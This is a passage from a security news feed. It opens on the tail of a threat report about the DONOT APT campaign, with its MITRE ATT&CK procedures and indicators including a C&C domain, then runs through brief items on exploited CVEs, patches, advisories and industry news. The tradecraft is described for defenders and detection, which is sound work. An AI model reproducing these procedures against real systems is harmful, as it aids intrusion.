the collection of system information before payload delivery indicate a more sophisticated approach. These changes highlight the growing complexity of APT campaigns and the need for improved detection and defense strategies. Threat hunting Packages The threat hunting package, including YARA and Sigma rules capable of detecting this campaign, can be downloaded from the linked GitHub pages. Recommendations  Deploy robust EDR solutions to monitor unusual PowerShell activity, scheduled task creation, and suspicious network connections to C&C servers. Ensure these tools are configured to flag and alert on anomalies. Limit the execution of PowerShell and other scripting tools to necessary users only and enforce least privilege policies to prevent malware from escalating privileges and performing malicious actions. Conduct frequent audits of scheduled tasks to identify any unusual or unauthorized tasks, particularly those involving rundll32.exe. Ensure only trusted applications are allowed to create or execute scheduled tasks. Implement behavior-based detection systems that can identify malicious actions, such as frequent attempts to contact C&C servers or unexpected encrypted data being transmitted. Implement a well-defined incident response plan with clear steps to handle potential APT intrusions. This plan should include rapid identification, containment, and recovery from any detected malicious activity. Conduct regular cybersecurity awareness training for employees, focusing on identifying phishing emails and handling suspicious attachments to reduce the risk of initial infection. MITRE ATT&CK® Techniques  Tactic Technique Procedure Initial Access (TA0001) Phishing (T1566) This campaign is likely to reach users through spam emails. Execution (TA0002) Command and Scripting Interpreter: PowerShell (T1059.001) PowerShell commands are used to decrypt and execute the lure RTF file and stager DLL payload. Execution (TA0002) Command and Scripting Interpreter: Windows Command Shell (T1059.003) Cmd.exe is used to copy PowerShell.exe to the %temp% directory as ""2SqSxDA2.exe"". Defense Evasion (TA0005) System Binary Proxy Execution: Rundll32 (T1218.011) Rundll32.exe is used to execute the stager payload. Persistence (TA0003) Scheduled Task/Job: Scheduled Task (T1053.005) A scheduled task is created for persistence, running the DLL payload regularly via rundll32.exe. Defense Evasion (TA0005) Indicator Removal on Host: File Deletion (T1070.004) Temporary PowerShell.exe file (""2SqSxDA2.exe"") is deleted after executing the malicious commands. Defense Evasion (TA0005) Obfuscated Files or Information (T1027) XOR and AES encryption mechanisms are used in various stages of the attack Command and Control (TA0011) Application Layer Protocol: Web Protocols (T1071.001) GET and POST requests are sent to the Threat Actor''s C&C server. Command and Control (TA0011) Remote File Copy (T1105) The additional payload is downloaded from the C&C server using a URL provided in the configuration. Exfiltration (TA0010) Exfiltration Over C2 Channel (T1041) Extensive system information is collected and exfiltrated to the C&C server via encrypted communication. Indicators of Compromise Indicator Indicator Type Comments cffe7eb01000de809b79a711702eaf3773f2e6167ce440f33f30bcd6fabcace3 SHA-256 Proc list 2024.lnk a7893c54edaecaa0e56010576a8249ad9149456f5d379868a0ecaa4c5c33fa70 SHA-256 CertPropOrigin.dll Internalfileserver[.]online domain C&C server References: https://mp.weixin.qq.com/s/qCcuU0E6d84tdQ1r2dCsjA https://twitter.com/StrikeReadyLabs/status/1852532673283268899 https://twitter.com/suyog41/status/1814230027560501248 The post Sailing Into Danger: DONOT APT’s Attack on Maritime & Defense Manufacturing appeared first on Cyble.

by CYBLE

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that two more flaws impacting the Palo Alto Networks Expedition software have come under active exploitation in the wild. To that end, it has added the vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the necessary updates

by The Hacker News

Hong Kong has initiated its first-ever cybersecurity drill, set to run for a total of 60 hours. The Hong Kong cybersecurity drill commenced on Friday, with plans to establish it as an annual event moving forward. Innovation minister Sun Dong emphasized the importance of this initiative, stating that maintaining cybersecurity is essential for promoting high-quality economic development and building a smart city.  At a launch ceremony for the drill, Sun noted that the Hong Kong cybersecurity plan is a “long-term task” that requires ongoing attention and cannot be considered complete. This proactive approach reflects the government’s commitment to addressing the growing threat landscape, particularly as recent months have seen a notable rise in hacking cases targeting various organizations, including companies and public entities.  Hong Kong Cybersecurity Drill  This Hong Kong cybersecurity drill, organized by the Digital Policy Office, involves collaboration with multiple stakeholders, including the Hong Kong police force, the Hong Kong Internet Registration Corporation, and the Hong Kong Institute of Information and Technology (HKIIT). This multifaceted approach aims to simulate real-world cyber threats and test the preparedness of government systems against potential attacks.  Tony Wong Chi-kwong, Commissioner for Digital Policy, explained that the drill features a “red” team of hackers composed of industry professionals, alongside students and faculty members from HKIIT and the Hong Kong College of Technology. This red team will simulate cyberattacks on government systems using tactics such as phishing emails and impersonation attempts to gain access to sensitive information, including login credentials and passwords, reported South China Morning Post.  Countering the red team’s efforts is a “blue” defense team, made up of staff from nine government departments and three public organizations. These defenders will operate from their offices to detect and respond to the simulated attacks in real time. Wong refrained from disclosing the specific departments involved, explaining that maintaining a controlled environment is crucial to the drill''s success. “We need a controllable scenario. We don’t want people with malicious intentions to mess around during this period,” he stated.  Throughout the 60-hour drill, the red team will remain stationed in the operation room at HKIIT in Tsing Yi. Wong pointed out the necessity of this realistic simulation: “In the real world, attacks have no time limit. There is no preset that tells you when they will attack you.” By creating an environment that mirrors actual conditions, the drill allows defenders to remain alert and ready to respond to threats as they arise.  Key Partners of the Cybersecurity Drills  As part of the exercise, normal operations will continue on government systems, providing an opportunity to evaluate whether current precautions and detection capabilities are sufficient. The blue team will earn points for successfully detecting an attack, while the red team will score points for any successful breaches. A panel of nine cybersecurity experts will oversee the scoring process, ensuring fairness and accuracy in the evaluation.  The HKIIT principal confirmed that all attack and defense activities will adhere to strict parameters established by the institute. Technical support will also be provided to maintain network stability, preventing disruptions to regular operations during the drill. Results from this cybersecurity drill will be shared at an upcoming cybersecurity forum scheduled for December.  Hong Kong has witnessed a significant uptick in cyberattacks in recent years, prompting authorities to take decisive action. In the first half of 2024 alone, the city reported 16,182 cases involving technology crimes, a 3.5% increase from the previous year’s figures. The financial impact of these incidents is staggering, with losses reaching HK$2.66 billion (approximately US$341.8 million).  In response to this concerning trend, the Hong Kong government proposed the Protection of Critical Infrastructure (Computer System) Bill, which aims to impose stringent security requirements on operators of essential infrastructure. Under this legislation, non-compliance could result in fines of up to HK$5 million. Currently, the bill is under consultation with the Security Bureau and is anticipated to be enacted by early 2026. 

by The Cyber Express

A new study by Specops Software explores the resilience of SHA256, a commonly used cryptographic hashing algorithm, against modern password-cracking techniques. The findings emphasize the algorithm’s effectiveness in protecting data, especially when combined with strong, complex passwords. However, the research also highlights vulnerabilities when using short or simple passwords, even with this robust technology. SHA256, […] The post Research Highlights SHA256 Password Security Strengths and Risks appeared first on IT Security Guru.

by IT Security Guru

Isaiah began his journey at Hack The Box in 2023, joining the BDR team. He is now an SLED Account Executive.

by Hack The Box Blog

Check out the CVEs attackers targeted the most last year, along with mitigation tips. Plus, a new guide says AI system audits must go beyond check-box compliance. Meanwhile, a report foresees stronger AI use by defenders and hackers in 2025. And get the latest on cloud security, SMBs'' MFA use and the CIS Benchmarks.Dive into six things that are top of mind for the week ending Nov. 15.1 - Report ranks 2023’s most frequently exploited vulnerabilitiesWondering what were attackers’ preferred vulnerabilities last year? Cyber agencies from the Five Eyes countries have ranked these go-to bugs in a joint advisory titled “2023 Top Routinely Exploited Vulnerabilities.”Published this week, the advisory details the 47 Common Vulnerabilities and Exposures (CVEs) that attackers most often exploited in 2023, along with their associated Common Weakness Enumerations (CWEs).The advisory also offers prevention and mitigation recommendations both to end-user organizations, and to software vendors and developers.A key takeaway: the majority of the CVEs listed were initially exploited as zero-days, unlike in 2022, when fewer than half were. In addition, the report found that attackers typically strike gold with vulnerabilities that are less than two years old.Here are some of the recommendations from the authoring cyber agencies in Australia, Canada, New Zealand, the U.K. and the U.S. for end-user organizations:Update software, including operating systems, applications and firmware, and prioritize patching CVEs included in CISA’s Known Exploited Vulnerabilities (KEV) catalog, especially those listed in the report. Maintain a continuously updated inventory of all your assets – both hardware and software, and on-prem and in the cloud. Deploy an automated, centralized patch-management system and adopt a patch-management process.Document the secure baseline configurations for all IT/OT systems.Require phishing-resistant multi-factor authentication for all users and on all VPN connections.Adopt the principle of least privilege when configuring access control.Secure internet-facing devices.Monitor your attack surface continuously.Contractually require your software vendors to provide you with software bills of materials (SBOMs) for their products, and inquire whether they employ secure-by-design principles.The five CVEs atop the list are:CVE-2023-3519CVE-2023-4966CVE-2023-20198CVE-2023-20273CVE-2023-27997To get all the details, read the full advisory “2023 Top Routinely Exploited Vulnerabilities.”For more information about vulnerability management, check out these Tenable resources:“From Bugs to Breaches: 25 Significant CVEs As MITRE CVE Turns 25” (blog)“Turning Data into Action: Intelligence-Driven Vulnerability Management” (blog)“Context Is King: From Vulnerability Management to Exposure Management” (blog)“Secure Your Sprawling Attack Surface With Risk-based Vulnerability Management” (blog)“Mitigating AI-Related Security Risks: Insights and Strategies with Tenable AI Aware” (on-demand webinar)2 - CSA: AI systems require holistic auditsWhen it comes to auditing artificial intelligence (AI) systems, auditors need to go beyond basic regulatory compliance requirements, and instead aim to assess their trustworthiness in a holistic, comprehensive manner.That’s the main message in the Cloud Security Alliance’s new report “Artificial Intelligence (AI) Risk Management: Thinking Beyond Regulatory Boundaries,” which was published this week and offers a risk-based framework for auditing AI systems throughout their lifecycle.While it’s critical for AI audits to be accurate, “trust in AI can only be achieved through a far-reaching approach to auditing that goes beyond what’s required,” researcher Ryan Gifford, a leader in the CSA’s AI Governance & Compliance Working Group, said in a statement.The paper addresses a wide range of AI audit elements, including AI governance; the role of data and sensors; applicable laws, regulations and standards; data and privacy; algorithms, training methods and models; and security systems – to name just a few.The 101-page document also includes hundreds of suggested questions to include in an AI audit, covering 25 topics. For example, the paper suggests 19 questions to ask about AI security systems, organized into seven sub-categories, including authentication and access control; data sanitization; encryption and key management; and security monitoring.These are just a few of the questions in the AI security systems section:How are security vulnerabilities actively identified and mitigated in software and hardware components? Through regular updates and patching?How is security data from multiple sources integrated and analyzed to provide a centralized platform for threat detection, incident response, and comprehensive security monitoring?How is the legitimacy of people and system accounts requesting access confirmed?Which authentication methods are used to ensure that only authorized entities gain access?For more information about AI system audits:“Auditing AI: The emerging battlefield of transparency and assessment” (Thomson Reuters)“AI transparency: What is it and why do we need it?” (TechTarget)“US agency calls for audits of AI systems to ensure accountability” (Roll Call)“Navigating the AI Audit: A Comprehensive Guide to Best Practices” (Law.com)“Trust but verify: Digging into audits for AI algorithm bias” (TechTarget)3 - Google: Attackers will deepen AI use in 2025Expect the AI cyberwars to get nastier and more sophisticated next year.In 2025, hackers will double down on their use of AI to boost their cyberattacks, while security teams will further leverage AI security tools to improve their cyberdefenses.That’s one of the main takeaways from Google Cloud’s “Cybersecurity Forecast 2025” report, released this week.“While AI is rapidly bringing new tools for threat detection and response, it also provides malicious actors with powerful capabilities for social engineering, disinformation, and other attacks,” reads the report. Here are some ways in which Google Cloud expects cyberattackers to more aggressively employ generative AI tools, LLMs, deepfakes and other AI technologies in 2025:To further scale and enhance social engineering attacks, including phishing and vishingTo supercharge cybercrime and cyberespionage To research vulnerabilities they can exploitTo streamline and accelerate development of malicious codeTo rapidly create content for disinformation campaigns“As AI capabilities become more widely available throughout 2025, enterprises will increasingly struggle to defend themselves against these more frequent and effective compromises,” the report reads.By the same token, cybersecurity teams will move into what the report calls “a second phase” of AI use. During the first phase, defenders used AI tools for repetitive tasks, such as summarizing reports and querying data sets. In 2025, cybersecurity teams will extend their AI use towards “semi-autonomous” security operations.“This includes being able to parse through alerts - even with false positives - to create a list of the highest priority items, enabling security teams to further triage and remediate the risks that matter most,” the report reads.However, the output of these AI security operations will still need to be verified by a security professional.The report also looks at how trends like geopolitical cyberthreats, ransomware and infostealer malware are likely to develop in 2025.For more information about cloud security trends:“Who’s Afraid of a Toxic Cloud Trilogy?” (Tenable)“Top Ten Cloud Security Mitigation Strategies” (U.S. National Security Agency)“What is cloud security management? A strategic guide” (TechTarget)“How to choose, configure and use cloud services securely” (U.K. National Cyber Security Centre)“How To Protect Your Cloud Environments and Prevent Data Breaches” (Tenable)4 - Tenable poll looks at cloud security practicesDuring our recent webinar “Empower Your 2025 Cloud Security Planning with Tenable''s Data Insights,” we informally polled attendees about cloud security issues, such as workloads afflicted by the “toxic trilogy” of cloud risks. Check out the results!(51 webinar attendees polled by Tenable, November 2024)(39 webinar attendees polled by Tenable, November 2024)Check out this on-demand webinar for a discussion of the valuable insights in the new “Tenable Cloud Risk Report 2024,” including concrete recommendations for improving your organization’s cloud security.5 - Report: MFA widely underused, misunderstood by SMBsA majority of small and medium-sized businesses (SMBs) surveyed about multi-factor authentication (MFA) haven’t adopted this identity and access management (IAM) technology and ignore its security benefits.That’s a key finding from a report based on a global survey of almost 2,300 SMBs conducted by the Cyber Readiness Institute (CRI) and published this week.“MFA is no longer a luxury or optional security measure - it is a fundamental necessity in today’s digital landscape. The time for SMBs to act is now,” the report reads.Specifically, 65% of SMBs polled said they haven’t implemented MFA, and most of them (61%) have no plans to adopt MFA in the foreseeable future.Barriers to adoption include: the cost to acquire and deploy MFA toolslack of technical expertise to choose the right productlack of awareness about MFA''s benefitsA bright spot for MFA adoption is the U.S., where SMBs buck the global trend, with 89% of respondents saying they’ve adopted the technology, and 55% saying they’re “very aware” of MFA and its benefits.The following best describes the level of awareness you have of MFA and the related security benefits at your companySo what can be done to promote MFA adoption among SMBs? Here are some recommendations from the report:Government agencies, industry groups, non-profit organizations and cybersecurity vendors should collaborate on campaigns to educate SMBs about the benefits of MFA.Software vendors should include MFA capabilities as part of broader software packages at no additional cost. Governments should offer incentives to SMBs, such as tax breaks and subsidies, while larger businesses should reward their SMB partners that adopt MFA.Vendors, government agencies and industry groups should offer SMBs technical assistance after they adopt MFA to ensure their continued success with the technology.To get more details, read: The CRI report “Unlocking MFA Adoption: Why Small and Medium-Sized Businesses Must Act Now to Strengthen Their Cybersecurity”The report’s announcement “New Study Underscores Slow Adoption of Multifactor Authentication By Global SMBs”6 - CIS Benchmarks for Apple, Azure, Oracle get updatedThe Center for Internet Security (CIS) just announced the latest updates to its CIS Benchmarks, including the ones for Azure Kubernetes Service (AKS), Oracle Cloud Infrastructure for Kubernetes (OKE) and several versions of Apple''s macOS.Specifically, these CIS Benchmarks were updated in October:CIS Amazon Web Services Foundations Benchmark v4.0.0CIS Apple macOS 13.0 Ventura Benchmark v3.0.0CIS Apple macOS 14.0 Sonoma Benchmark v2.0.0CIS Apple macOS 13.0 Ventura Cloud-tailored Benchmark v1.1.0CIS Azure Kubernetes Service (AKS) Benchmark v1.6.0CIS MongoDB 6 Benchmark v1.2.0CIS MongoDB 7 Benchmark v1.1.0CIS Oracle Cloud Infrastructure for Kubernetes (OKE) Benchmark v1.6.0CIS SUSE Linux Enterprise 12 Benchmark v3.2.0In addition, these three new CIS Benchmarks were released:CIS Apple iOS 18 Benchmark v1.0.0CIS Apple iPadOS 18 Benchmark v1.0.0CIS Apple macOS 15.0 Sequoia Benchmark v1.0.0  The CIS Benchmarks’ secure-configuration guidelines are designed to help security teams harden software against attacks. There are currently more than 100 Benchmarks for 25-plus vendor product families. There are CIS Benchmarks for cloud platforms; databases; desktop and server software; mobile devices; operating systems; and more.To get more details, read the CIS blog “CIS Benchmarks November 2024 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:“Getting to Know the CIS Benchmarks” (CIS)“Security Via Consensus: Developing the CIS Benchmarks” (Dark Reading)“How to Unlock the Security Benefits of the CIS Benchmarks” (Tenable)“CIS Benchmarks Communities: Where configurations meet consensus” (Help Net Security)“CIS Benchmarks: DevOps Guide to Hardening the Cloud” (DevOps)

by Tenable

The Computer Emergency Response Team of India (CERT-In) has issued a high-severity alert regarding a newly identified vulnerability in Cisco''s Enterprise Chat and Email (ECE) platform. Tagged as CERT-In Vulnerability Note CIVN-2024-0339, this vulnerability could allow an unauthenticated, remote attacker to cause a Denial of Service (DoS) attack on affected Cisco systems. This notice primarily targets IT administrators and individuals responsible for securing and maintaining Cisco ECE systems. Who is Affected? This vulnerability primarily impacts IT administrators and individuals tasked with maintaining or securing Cisco Enterprise Chat and Email systems. For those responsible for Cisco ECE, it’s essential to check if EAAS is active. To verify, log into the System Console, navigate to Partitions > Partition > Services > Unified CCE > EAAS > Instances, and confirm if an EAAS instance is running. Systems running EAAS are vulnerable to this security risk. Overview of the Vulnerability The issue stems from insufficient validation of Media Routing Peripheral Interface Manager (MR PIM) traffic. An unauthenticated attacker, operating remotely, could exploit this vulnerability by sending specifically crafted MR PIM traffic to the affected system. This results in a failure of the MR PIM connection between Cisco ECE and the Cisco Unified Contact Centre Enterprise (CCE), which in turn disrupts EAAS functions. The vulnerability can lead to a Denial of Service (DoS) condition, effectively disabling the EAAS feature and preventing customers from initiating chat, callback, or delayed callback sessions. While regular operation can be restored by restarting the EAAS process manually, this interruption poses significant service disruption risks for organizations relying on real-time customer service solutions through Cisco ECE. [caption id=""attachment_92936"" align=""aligncenter"" width=""1024""] Source: CERT-In[/caption] Cisco’s Response and Solutions Advisory and Fix Cisco has responded with an advisory (ID: cisco-sa-ece-dos-Oqb9uFEv) detailing the vulnerability, which includes a recommendation to upgrade affected software to a fixed release. The vulnerability is assigned CVE-2024-20484 with a CVSS base score of 7.5, emphasizing the high impact of this flaw. Affected Products Only Cisco ECE systems configured to use EAAS are affected. Customers can verify EAAS configurations through the System Console as noted earlier. No Available Workarounds Currently, there are no temporary solutions or workarounds to mitigate this vulnerability. The only effective measure is upgrading to the appropriate fixed software version as released by Cisco. Fixed Releases Cisco has issued updates that address the vulnerability. Here is a breakdown of the recommended upgrades: Cisco ECE Release First Fixed Release Earlier than 12.5 Migrate to a fixed release 12.5 12.5(1) ES9 12.6 12.6(1) ES9 ET3 It is recommended for customers to update to these versions to ensure security against this vulnerability. Next Steps for Cisco Users For Contracted Customers Customers with an active Cisco service contract can access these updates through the usual software update channels. Those entitled to service contracts may access security patches and support without additional fees, but they must abide by the Cisco software license terms. For Non-Contracted Customers If you purchased Cisco products directly or through an authorized reseller but do not have a service contract, you can still obtain updates by contacting Cisco Technical Assistance Center (TAC). Be sure to provide the product serial number and a reference to this advisory to verify your eligibility for a free upgrade. Licensing and Installation When downloading these updates, ensure that your device’s configurations are compatible with the new releases. For those uncertain, Cisco recommends reaching out to their support team or the TAC. All updates should be acquired through authorized channels to avoid issues with licensing or support. Key Security Recommendations Prioritize Immediate Updates IT administrators should prioritize upgrading affected Cisco ECE systems to the versions specified. Given the high severity rating, this vulnerability represents a substantial risk to uninterrupted service. Verify EAAS Configuration Confirm that EAAS is active on your Cisco ECE system. If you are not using EAAS, your system may not be affected, but it’s recommended to still monitor for updates and further advisories. Monitor for Further Security Notices Cisco regularly releases updates and advisories for various security vulnerabilities. IT teams should routinely check Cisco’s security advisories for new information that may impact their systems and infrastructures. Manually Restart EAAS if Affected by DoS In cases where a system is impacted by this vulnerability, users will need to restart the EAAS process manually. This can be done via the System Console by selecting Shared Resources > Services > Unified CCE > EAAS, then clicking “Start.”

by The Cyber Express

The Vietnam Authority of Information Security (AIS), part of the Ministry of Information and Communications, has signed a memorandum of understanding (MoU) with the Cybersecurity and Infrastructure Security Agency (CISA) under the US Department of Homeland Security.   This agreement marks the official establishment of a partnership focused on ensuring network security and strengthening the comprehensive strategic relationship between Vietnam and the United States.  Vietnam Authority of Information Security Forms Partnership with CISA  The signing ceremony in Hanoi highlighted Vietnam’s commitment to protect its critical digital infrastructure and promoting a secure cyberspace. Tran Quang Hung, the acting director of AIS, highlighted the significance of this collaboration, noting that the partnership would enhance Vietnam’s cybersecurity capabilities in the face of increasingly sophisticated cyber threats. “Working with an experienced organization like CISA bolsters our ability to protect national interests and contributes to a safer, more prosperous future for all,” reported The Star.  CISA plays a crucial role in US cybersecurity efforts, particularly in protecting critical infrastructure from a range of cyber threats. During the signing, Trent Frazier, the deputy assistant director of the Stakeholder Engagement Division at CISA, emphasized that “collaboration is essential for successfully defending critical infrastructure and enhancing overall cybersecurity capabilities.” The partnership is expected to benefit not only Vietnam but also advance US efforts to promote innovation and secure its digital assets while combating the rising tide of cyber risks.  This MoU aims to solidify the existing relationship between the two agencies, establishing a framework for ongoing cooperation. Both parties are dedicated to working together to achieve the goals outlined in the agreement, and they anticipate that this collaboration will evolve into a sustainable and robust partnership, aligned with the broader strategic alliance between Vietnam and the US.  Much-Needed Collaboration  Vietnam’s proactive stance on cybersecurity is especially timely, given the increasing prevalence of cyber threats, including ransomware attacks and state-sponsored hacking. The cooperation with CISA is anticipated to provide Vietnam with valuable access to advanced cybersecurity practices and resources.  Furthermore, this agreement reflects a broader commitment to international collaboration in cybersecurity. As threats continue to evolve, it becomes imperative for nations to work together to protect their digital infrastructure. The partnership between the Vietnam Authority of Information Security and CISA exemplifies the importance of united efforts in addressing global cybersecurity challenges.  The necessity for secure and resilient cyberspace is the need for the modern world. By partnering with CISA, Vietnam is taking significant strides to enhance its cybersecurity posture, ensuring that it can effectively defend against potential attacks while contributing to a safer digital environment for its citizens and businesses.  With a shared commitment to protecting critical infrastructure and addressing evolving cyber threats, both countries are better positioned to ensure a secure cyberspace for their populations and economies. 

by The Cyber Express

CISA warned of two critical and actively exploited vulnerabilities in Expedition one week after another CVE came under active exploitation in the same product.

by Cybersecurity Dive

The company said the additional disclosure method using the Common Security Advisory Framework will help organizations better prioritize CVEs.

by Cybersecurity Dive

A pair of actively exploited Microsoft zero-day vulnerabilities highlighted an active November Patch Tuesday, which also saw updates from several IT vendors. Overview Cyble Research and Intelligence Labs (CRIL) researchers investigated 22 vulnerabilities and eight dark web exploits from Nov. 6 to 12 and highlighted nine vulnerabilities that merit high-priority attention from security teams. CRIL researchers also identified six dark web exploits that are at high risk in Cyble’s weekly IT vulnerability report to clients, which examined two Microsoft zero-days and vulnerabilities from Veeam, Cisco, HPE Aruba, D-Link, Citrix, and others. Security teams should identify the vulnerabilities that are present in their environments and apply patches and mitigations promptly. The Week’s Top IT Vulnerabilities Here are the top IT vulnerabilities identified by Cyble threat intelligence researchers this week. CVE-2024-43451 is an NTLM hash disclosure spoofing vulnerability found in all supported versions of Windows that has been exploited in the wild since at least April. Researchers disclosed this week that suspected Russian hackers exploited it for zero-day attacks targeting Ukrainian entities. The vulnerability was triggered by phishing emails that contained links to download a malicious Internet shortcut file, which, when interacted with, triggered the vulnerability to connect to a remote server and download malware. CVE-2024-49039 is an elevation of privilege vulnerability in Windows Task Scheduler that has also been attacked. From a low-privilege AppContainer, an attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment, Microsoft said. A successful exploit could allow an attacker to execute RPC functions that are restricted to privileged accounts. CVE-2024-49040 is a high-severity spoofing vulnerability in Microsoft Exchange Server that allows attackers to forge legitimate senders on incoming emails and makes malicious messages much more effective. A researcher reported a Proof of Concept (PoC) for this vulnerability, but Microsoft paused the update after some customers reported issues with Transport rules stopping periodically after the update was installed. CVE-2024-40711 is a critical vulnerability in Veeam VBR (Veeam Backup & Replication) servers caused by the deserialization of untrusted data weakness that unauthenticated threat actors can exploit to gain remote code execution (RCE). Previously, the vulnerability was observed to be leveraged in Akira and Fog ransomware attacks. At present, researchers have observed that it is now exploited to deploy a newly identified strain of Frag ransomware. CVE-2024-42509 and CVE-2024-47460 are command injection vulnerabilities in AOS-8 and AOS-10 versions of HPE Aruba''s network operating system. The flaw lies in the underlying CLI service, which could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba''s Access Point management protocol) UDP port (8211). Successful exploitation results in the ability to execute arbitrary code as a privileged user on the underlying operating system. Cyble researchers detailed the vulnerabilities and others in a separate blog. CVE-2024-20418 is a critical vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points, which is a specialized software solution designed to provide robust and reliable wireless connectivity for industrial applications. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system of the affected device. Cyble also covered this vulnerability in a separate blog. CVE-2024-10914 is a critical command injection vulnerability in end-of-life (EOL) D-Link network-attached storage (NAS) devices. Unauthenticated attackers can exploit it to inject arbitrary shell commands by sending malicious HTTP GET requests to vulnerable D-Link NAS devices exposed online. Researchers observed that attackers are exploiting the vulnerability with publicly available exploit codes. CVE-2024-11068 is a critical incorrect use of privileged API vulnerability impacting the end-of-life D-Link DSL6740C modem. The vulnerability allows unauthenticated remote attackers to modify any user’s password by leveraging the API, thereby granting access to Web, SSH, and Telnet services using that user’s account. Since D-Link recently announced that it will not provide patches or updates for this EOL product, the vulnerability poses a significant risk to users. Vulnerabilities and Exploits on Underground Forums CRIL researchers also observed multiple Telegram channels and underground forums where threat actors shared or discussed exploits weaponizing vulnerabilities. Those vulnerabilities include: CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. This vulnerability allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise. CVE-2024-50340: A high-security vulnerability affecting the Symfony PHP framework. The vulnerability allows an attacker to manipulate the application''s environment or debug mode by sending specially crafted query strings. CVE-2024-8068 and CVE-2024-8069: These recently identified vulnerabilities in Citrix Session Recording pose significant security risks for Citrix environments. CVE-2024-8068 allows for privilege escalation to the NetworkService Account access level, and the vulnerability CVE-2024-8069 allows for limited remote code execution with the privileges of a NetworkService Account. CVE-2024-47295: A high-severity vulnerability identified in the SEIKO EPSON Web Config allows a remote unauthenticated attacker to set an arbitrary administrator password on affected devices. The vulnerability results from an insecure initial password configuration in which the administrator password is left blank. CRIL researchers also observed a threat actor discussing the critical vulnerability CVE-2023-38408, which affects 26 million internet-facing OpenSSH assets detected by Cyble. The vulnerability allows for remote code execution (RCE) when the SSH agent is forwarded to an attacker-controlled system. Cyble Recommendations To protect against these vulnerabilities and exploits, organizations should implement the following best practices: To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors. Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency. Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats. Implement immutable, air-gapped, ransomware-resistant backup procedures for sensitive and critical data. Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats. Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response. Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions. Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards. Conclusion These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity. The post Cyble IT Vulnerability Report: Microsoft Zero Days Under Attack appeared first on Cyble.

by CYBLE

by ComputerWeekly

In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and seeking publicity for several new money making schemes.

by Krebs on Security

The proposed rules codify existing temporary directives requiring pipeline and railroad operators to report cyber incidents and create cyber-risk management plans.

by Dark Reading

SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)

by Exploit DB

Frenos offers a zero-impact, continuous security assessment platform for operational technology environments.

by Dark Reading

Multiple threat actors have been found taking advantage of an attack technique called Sitting Ducks to hijack legitimate domains for using them in phishing attacks and investment fraud schemes for years. The findings come from Infoblox, which said it identified nearly 800,000 vulnerable registered domains over the past three months, of which approximately 9% (70,000) have been subsequently

by The Hacker News

North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities. The post Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack appeared first on Unit 42.

by Palo Alto Networks - Unit42

A data broker has confirmed a business contact information database containing 132.8 million records has been leaked online.

by Malwarebytes Labs

Several versions of PostgreSQL are impacted, and customers will need to upgrade in order to patch.

by Dark Reading

Learn how to identify, understand, attack, and remediate SMB shares configured with excessive privilege in active directory environments with the help of new charts, graphs, and LLM capabilities. The post Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 appeared first on NetSPI.

by NetSPI

Although attacks slightly decreased last quarter, ransomware remains a critical threat, with new strains like Cicada3301 targeting Linux and ESXi systems.

by ITPro Today

One of the challenges facing companies that expand their operations rapidly is maintaining consistent security as their attack surfaces grow. Learn how Sparc Group''s relationship with Barracuda has developed in this case study blog.

by Barracuda

In addition to his prison sentence, he will have to pay more than $1 million in restitution to his victims.

by Dark Reading

This security feature protects your data from thieves. Here''s how.

by ZDNET Security

Google has revealed that bad actors are leveraging techniques like landing page cloaking to conduct scams by impersonating legitimate sites. ""Cloaking is specifically designed to prevent moderation systems and teams from reviewing policy-violating content which enables them to deploy the scam directly to users,"" Laurie Richardson, VP and Head of Trust and Safety at Google, said. ""The landing

by The Hacker News

Eight Android apps on the Google Play Store, downloaded by millions, contain the Android.FakeApp trojan, stealing user data…

by Hackread

People are still opting for easy-to-guess passwords, says NordPass. Here''s how to better protect your accounts and why you should.

by ZDNET Security

Exclusive: Encord puts multimodal AI data - including audio - all in one platform.

by ZDNET Security

As alerts pile up, the complexity can overwhelm security professionals, allowing real threats to be missed. This is where vendors must step up.

by Dark Reading

The role of a chief information security officer (CISO) is more challenging than ever before, and recent studies indicate that job dissatisfaction among CISOs is alarmingly high.

by Barracuda

